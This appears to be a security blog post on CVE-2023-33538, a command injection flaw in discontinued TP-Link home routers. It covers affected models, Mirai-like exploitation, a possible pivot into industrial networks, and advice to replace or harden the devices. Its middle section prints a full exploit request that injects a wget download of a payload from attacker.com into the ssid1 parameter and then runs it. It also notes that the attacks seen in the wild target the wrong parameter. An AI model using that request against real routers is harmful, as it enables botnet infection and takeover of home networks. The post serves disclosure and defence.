A vulnerability disclosed in 2023 is back in the news — because attackers are actively using it right now.
CVE-2023-33538 is a command injection bug with a CVSS score of 8.8 The Hacker News in several TP-Link home router models. CISA added it to its Known Exploited Vulnerabilities catalog in June 2025 CVE Details , and Unit 42 researchers confirmed active exploitation attempts shortly after. The situation is messier than most CVE alerts because the affected products are end-of-life, meaning no vendor patches are available CVE Details . The fix is to throw the router away.
What's Vulnerable
Three discontinued TP-Link router models are affected: TL-WR940N V2/V4, TL-WR841N V8/V10, and TL-WR740N V1/V2. CinchOps, Inc. These are mass-market home routers. Millions were sold. A lot of them are still plugged in.
How the Vulnerability Works
The /userRpm/WlanNetworkRpm endpoint contains a vulnerability in processing the ssid1 parameter sent through an HTTP GET request. The parameter value is not sanitized when the router processes it, so an attacker can send commands directly through it — allowing remote code execution on the device. Palo Alto Networks
The attack surface is the router's web management interface. The flaw requires no authentication to exploit in some configurations, meaning attackers can compromise vulnerable routers without needing login credentials or physical access. CinchOps, Inc. That said, Unit 42's deeper analysis found a wrinkle: successful exploitation actually requires authentication to the router's web interface paloaltonetworks — which in practice isn't much of a barrier, since most of these devices still run default credentials.
A typical exploit request looks like this:
GET /userRpm/WlanNetworkRpm.htm?ssid1=HomeNetwork;wget+http://attacker.com/payload+-O+/tmp/x;chmod+777+/tmp/x;/tmp/x HTTP/1.1
Host: 192.168.1.1
The ssid1 parameter accepts the injected commands. The router executes them without validation.
What Attackers Are Actually Doing
The observed payloads are malicious binaries characteristic of Mirai-like botnet malware, which the exploits attempt to download and execute on vulnerable devices. Palo Alto Networks The pattern is straightforward: find the router, authenticate with default credentials, inject a wget command to pull down a binary, make it executable, run it.
Unit 42's analysis uncovered something interesting though. The exploit attempts contain errors. While the endpoint /userRpm/WlanNetworkRpm.htm is correct, the exploits are incorrectly attempting to inject malicious commands into the ssid parameter. The actual vulnerable parameter on the target system is ssid1. Palo Alto Networks
So the attacks in the wild are technically flawed. They'd fail on a properly configured device. But that doesn't mean the underlying vulnerability isn't real — it is. It just means the botnet operators got the parameter name wrong, and the vulnerability is still wide open for anyone who looks at the original disclosure more carefully.
The Botnet Connection
In December 2024, Palo Alto Networks Unit 42 identified samples of an OT-centric malware called FrostyGoop. One of the IP addresses associated with an ENCO control device was also linked to a TP-Link WR740N router used to facilitate web browser access to the ENCO device. SecPod Blog Direct evidence tying CVE-2023-33538 to that specific attack doesn't exist, but the association illustrates the real-world risk: compromised home routers becoming pivot points into operational technology networks, including industrial systems.
Compromised routers can also be recruited into botnets to launch DDoS attacks, used to steal data transmitted through the network, or serve as a gateway to deploy malware on connected devices. SecPod Blog
Why This Is Still a Problem in 2025
The vulnerability was first disclosed in June 2023. TP-Link discontinued these router models in 2017. The combination of old hardware, no patch, and default credentials still in place on deployed devices is exactly the kind of long tail that keeps security researchers employed.
TP-Link told The Hacker News that it provided fixes through its tech support platform since 2018, and encouraged customers to contact support for patched firmware or to upgrade their devices. The Hacker News The practical reality: most people who bought a TP-Link router eight years ago are not checking in with TP-Link support for firmware updates. The router is just sitting there, doing its job, running software from a decade ago.
The EPSS score for this vulnerability sits at 90.63% probability of exploitation activity in the next 30 days CVE Details — that puts it in roughly the top percentile of all tracked CVEs for active exploitation risk.
What To Do
If you own or manage any of the affected models (TL-WR940N V2/V4, TL-WR841N V8/V10, TL-WR740N V1/V2), the recommendation is unambiguous: replace the device. There is no patch coming.
If replacement isn't immediate:
- Disable remote management (usually under "Remote Management" or "Web Management" in router settings)
- Change default admin credentials to something non-trivial
- Segment the router from critical devices on your network
- Monitor for unusual outbound traffic
For organizations doing network audits, these models will surface in legacy environments, branch offices, and home office setups for employees on VPN. They're worth explicitly checking for.
The Broader Pattern
CVE-2023-33538 is not an exotic vulnerability. It's a missing input sanitization check on a parameter that processes user input. The fix at the code level would have been a few lines. The real problem is that the devices were EOL before the vulnerability was even publicly documented, which means there's no vendor support left to deploy a fix.
This pattern keeps repeating. Old IoT hardware, no update mechanism, default credentials, perpetually connected. The Mirai botnet first appeared in 2016 exploiting default credentials on IoT devices. Eight years later, the same playbook still works on millions of deployed devices.
The vulnerability isn't the interesting part. The infrastructure that keeps these devices running for a decade after the vendor stopped caring is.
References:
Top comments (0)